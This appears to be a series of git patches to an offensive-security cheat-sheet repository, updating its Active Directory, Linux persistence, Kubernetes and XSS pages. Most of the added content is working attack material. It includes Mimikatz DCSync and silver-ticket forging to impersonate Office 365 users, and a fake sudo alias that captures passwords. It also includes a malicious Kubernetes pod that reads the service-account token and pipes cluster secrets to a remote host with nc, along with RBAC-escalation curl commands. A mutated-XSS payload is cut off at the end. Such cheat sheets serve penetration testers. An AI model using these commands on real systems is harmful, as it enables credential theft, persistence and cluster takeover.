[Kerberoast](#kerberoast) + * [Kerberoasting](#kerberoasting) * [KRB_AS_REP roasting](#krb_as_rep-roasting) * [Pass-the-Hash](#pass-the-hash) * [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) @@ -34,6 +34,7 @@ * [Password spraying](#password-spraying) * [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etc-krb5-keytab) * [PXE Boot image attack](#pxe-boot-image-attack) + * [Impersonating Office 365 Users on Azure AD Connect](#impersonating-office-365-users-on-azure-ad-connect) ## Tools @@ -123,6 +124,13 @@ Rubeus.exe kerberoast [/spn:"blah/blah"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] ``` +* [AutomatedLab](https://github.com/AutomatedLab/AutomatedLab) + ```powershell + New-LabDefinition -Name GettingStarted -DefaultVirtualizationEngine HyperV + Add-LabMachineDefinition -Name FirstServer -OperatingSystem 'Windows Server 2016 SERVERSTANDARD' + Install-Lab + Show-LabDeploymentSummary + ``` ## Most common paths to AD compromise @@ -229,6 +237,7 @@ ls # list files Download a folder recursively ```powershell +smbclient -U username //10.0.0.1/SYSVOL smbclient //10.0.0.1/Share smb: \> mask "" smb: \> recurse ON @@ -505,11 +514,11 @@ root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 ``` -### Kerberoast +### Kerberoasting > "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names) -Any valid domain user can request a kerberos ticket for any domain service with `GetUserSPNs`. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as. +Any valid domain user can request a kerberos ticket (TGS) for any domain service with `GetUserSPNs`. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as. ```powershell $ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request @@ -536,6 +545,10 @@ hashcat -m 13100 -a 0 hash.txt crackstation.txt ./john ~/hash.txt --wordlist=rockyou.lst ``` +Mitigations: +* Have a very long password for your accounts with SPNs +* Make sure no users have SPNs + ### KRB_AS_REP Roasting If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting @@ -830,6 +843,12 @@ Extract the base64 TGT from Rubeus output and load it to our current session. Then you can use DCsync or another attack : `Mimikatz> lsadump::dcsync /user:HACKER\krbtgt` + +#### Mitigation + +* Ensure sensitive accounts cannot be delegated +* Disable the Print Spooler Service + ### Resource-Based Constrained Delegation Resource-based Constrained Delegation was introduced in Windows Server 2012. @@ -1073,8 +1092,44 @@ PXE allows a workstation to boot from the network by retrieving an operating sys ``` +### Impersonating Office 365 Users on Azure AD Connect + +Prerequisites: + +* Obtain NTLM password hash of the AZUREADSSOACC account + ```powershell + mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit + ``` + +* AAD logon name of the user we want to impersonate (userPrincipalName or mail) + ```powershell + elrond@contoso.com + ``` + +* SID of the user we want to impersonate + ```powershell + S-1-5-21-2121516926-2695913149-3163778339-1234 + ``` + + +Create the Silver Ticket and inject it into Kerberos cache: +```powershell +mimikatz.exe "kerberos::golden /user:elrond +/sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 +/domain:contoso.local /rc4:f9969e088b2c13d93833d0ce436c76dd +/target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit +``` + +Launch Mozilla Firefox, go to about:config +```powershell +network.negotiate-auth.trusted-uris="https://aadg.windows.net.nsatc.net,https://autologon.microsoftazuread-sso.com". +``` + +Navigate to any web application that is integrated with our AAD domain. Once at the Office365 logon screen, fill in the user name, while leaving the password field empty. Then press TAB or ENTER. + ## References +* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](#https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) * [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf) * [Abusing S4U2Self: Another Sneaky Active Directory Persistence - Alsid](https://alsid.com/company/news/abusing-s4u2self-another-sneaky-active-directory-persistence) @@ -1129,4 +1184,5 @@ PXE allows a workstation to boot from the network by retrieving an operating sys * [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf) * [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) * [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/) -* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic) \ No newline at end of file +* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic) +* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https://www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/) \ No newline at end of file diff --git a/Methodology and Resources/Linux - Persistence.md b/Methodology and Resources/Linux - Persistence.md index 567987bc..f84fc8e5 100644 --- a/Methodology and Resources/Linux - Persistence.md +++ b/Methodology and Resources/Linux - Persistence.md @@ -67,6 +67,26 @@ fi rm /tmp/$TMPNAME2 ``` +or add the following line inside its .bashrc file. + +```powershell +$ chmod u+x ~/.hidden/fakesudo +$ echo "alias sudo=~/.hidden/fakesudo" >> ~./bashrc +``` + +and create the `fakesudo` script. + +```powershell +read -sp "[sudo] password for $USER: " sudopass +echo "" +sleep 2 +echo "Sorry, try again." +echo $sudopass >> /tmp/pass.txt + +/usr/bin/sudo $@ +``` + + ## Backdooring a startup service ```bash diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 90a60c0e..94d0b59a 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -266,3 +266,4 @@ unzip ngrok-stable-linux-amd64.zip * [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences) * [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/) * [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/) +* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) \ No newline at end of file From 24516ca7a1b6651ceaabf56cb0ba985fb2592128 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 5 Nov 2019 11:05:59 +0100 Subject: [PATCH 113/222] Kubernetes attacks update + ref to securityboulevard --- Kubernetes/readme.md | 190 ++++++++++++++---- .../Active Directory Attack.md | 4 + 2 files changed, 160 insertions(+), 34 deletions(-) diff --git a/Kubernetes/readme.md b/Kubernetes/readme.md index 7971af27..841e3d96 100644 --- a/Kubernetes/readme.md +++ b/Kubernetes/readme.md @@ -1,42 +1,164 @@ +# Kubernetes + > Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation. -### API addresses that you should know *(External network visibility)* ---- -#### - cAdvisor -``` -curl -k https://:4194 -``` -#### - Insecure API server -``` -curl -k https://:8080 -``` -#### - Secure API Server -``` -curl -k https://:(8|6)443/swaggerapi -curl -k https://:(8|6)443/healthz -curl -k https://:(8|6)443/api/v1 -``` -#### - etcd API -``` -curl -k https://:2379 -curl -k https://:2379/version -``` -#### - Kubelet API -``` -curl -k https://:10250 -curl -k https://:10250/metrics -curl -k https://:10250/pods -``` -#### - kubelet (Read only) -``` -curl -k https://:10255 -``` ----- -### Tools for detecting misconfigurations in Kubernetes: ---- +## Summary + +- [Tools](#tools) +- [RBAC Configuration](#rbac-configuration) + - [Listing Secrets](#listing-secrets) + - [Access Any Resource or Verb](#access-any-resource-or-verb) + - [Pod Creation](#pod-creation) + - [Privilege to Use Pods/Exec](#privilege-to-use-pods-exec) + - [Privilege to Get/Patch Rolebindings](#privilege-to-get-patch-rolebindings) + - [Impersonating a Privileged Account](#impersonating-a-privileged-account) +- [API addresses that you should know](#api-adresses-that-you-should-know) +- [References](#references) + +## Tools * [kubeaudit](https://github.com/Shopify/kubeaudit). kubeaudit is a command line tool to audit Kubernetes clusters for various different security concerns: run the container as a non-root user, use a read only root filesystem, drop scary capabilities, don't add new ones, don't run privileged, ... * [kubesec.io](https://kubesec.io/). Security risk analysis for Kubernetes resources. * [kube-bench](https://github.com/aquasecurity/kube-bench). kube-bench is a Go application that checks whether Kubernetes is deployed securely by running the checks documented in the [CIS Kubernetes Benchmark](https://www.cisecurity.org/benchmark/kubernetes/). * [katacoda](https://katacoda.com/courses/kubernetes). Learn Kubernetes using interactive broser-based scenarios. + +## RBAC Configuration + +### Listing Secrets + +An attacker that gains access to list secrets in the cluster can use the following curl commands to get all secrets in "kube-system" namespace. + +```powershell +curl -v -H "Authorization: Bearer " https://:/api/v1/namespaces/kube-system/secrets/ +``` + +### Access Any Resource or Verb + +```powershell +resources: +- '*' +verbs: +- '*' +``` + +### Pod Creation + +Check your right with `kubectl get role system:controller:bootstrap-signer -n kube-system -o yaml`. +Then create a malicious pod.yaml file. + +```yaml +apiVersion: v1 +kind: Pod +metadata: + name: alpine + namespace: kube-system +spec: + containers: + - name: alpine + image: alpine + command: ["/bin/sh"] + args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000'] + serviceAccountName: bootstrap-signer + automountServiceAccountToken: true + hostNetwork: true +``` + +Then `kubectl apply -f malicious-pod.yaml` + +### Privilege to Use Pods/Exec + +```powershell +kubectl exec -it -n –- sh +``` + +### Privilege to Get/Patch Rolebindings + +The purpose of this JSON file is to bind the admin "CluserRole" to the compromised service account. +Create a malicious RoleBinging.json file. + +```powershell +{ + "apiVersion": "rbac.authorization.k8s.io/v1", + "kind": "RoleBinding", + "metadata": { + "name": "malicious-rolebinding", + "namespcaes": "default" + }, + "roleRef": { + "apiGroup": "*", + "kind": "ClusterRole", + "name": "admin" + }, + "subjects": [ + { + "kind": "ServiceAccount", + "name": "sa-comp" + "namespace": "default" + } + ] +} +``` + +```powershell +curl -k -v -X POST -H "Authorization: Bearer " -H "Content-Type: application/json" https://:/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings -d @malicious-RoleBinging.json +curl -k -v -X POST -H "Authorization: Bearer " -H "Content-Type: application/json" https://:/api/v1/namespaces/kube-system/secret +``` + +### Impersonating a Privileged Account + +```powershell +curl -k -v -XGET -H "Authorization: Bearer " -H "Impersonate-Group: system:masters" -H "Impersonate-User: null" -H "Accept: application/json" https://:/api/v1/namespaces/kube-system/secrets/ +``` + + +## API addresses that you should know + +*(External network visibility)* + +### cAdvisor + +```powershell +curl -k https://:4194 +``` + +### Insecure API server + +```powershell +curl -k https://:8080 +``` + +### Secure API Server + +```powershell +curl -k https://:(8|6)443/swaggerapi +curl -k https://:(8|6)443/healthz +curl -k https://:(8|6)443/api/v1 +``` + +### etcd API + +```powershell +curl -k https://:2379 +curl -k https://:2379/version +``` + +### Kubelet API + +```powershell +curl -k https://:10250 +curl -k https://:10250/metrics +curl -k https://:10250/pods +``` + +### kubelet (Read only) + +```powershell +curl -k https://:10255 +``` + + +## References + +- [Kubernetes Pentest Methodology Part 1 - by Or Ida on August 8, 2019](https://securityboulevard.com/2019/08/kubernetes-pentest-methodology-part-1) +- [Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019](https://securityboulevard.com/2019/09/kubernetes-pentest-methodology-part-2) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index f14954e3..39ef6695 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -151,6 +151,10 @@ Administrator S-1-5-21-297520375-2634728305-5197346142-500 Guest S-1-5-21-297520375-2634728305-5197346142-501 krbtgt S-1-5-21-297520375-2634728305-5197346142-502 lambda S-1-5-21-297520375-2634728305-5197346142-1110 + +# powerview +Convert-NameToSid high-sec-corp.localkrbtgt +S-1-5-21-2941561648-383941485-1389968811-502 ``` ```bash From 6fecedd880b07e647c42c1ce764aba68838ea5dd Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 6 Nov 2019 18:32:29 +0100 Subject: [PATCH 114/222] MXSS - Mutated XSS - Google POC --- Kubernetes/readme.md | 2 ++ XSS Injection/README.md | 12 ++++++++++++ 2 files changed, 14 insertions(+) diff --git a/Kubernetes/readme.md b/Kubernetes/readme.md index 841e3d96..8dd34701 100644 --- a/Kubernetes/readme.md +++ b/Kubernetes/readme.md @@ -141,6 +141,7 @@ curl -k https://:(8|6)443/api/v1 ```powershell curl -k https://:2379 curl -k https://:2379/version +etcdctl --endpoints=http://:2379 get / --prefix --keys-only ``` ### Kubelet API @@ -155,6 +156,7 @@ curl -k https://:10250/pods ```powershell curl -k https://:10255 +http://:10255/pods ``` diff --git a/XSS Injection/README.md b/XSS Injection/README.md index f8cac694..337c985b 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -18,6 +18,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [XSS Hunter](#xss-hunter) - [Other Blind XSS tools](#other-blind-xss-tools) - [Blind XSS endpoint](#blind-xss-endpoint) +- [Mutated XSS](#mutated-xss) - [Polyglot XSS](#polyglot-xss) - [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads) - [Bypass case sensitive](#bypass-case-sensitive) @@ -422,6 +423,15 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu - Comment Box - Administrative Panel +## Mutated XSS + +Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`. + +Mutated XSS from Masato Kinugawa, used against DOMPurify component on Google Search. Technical blogposts available at https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/ and https://research.securitum.com/dompurify-bypass-using-mxss/. + +```javascript +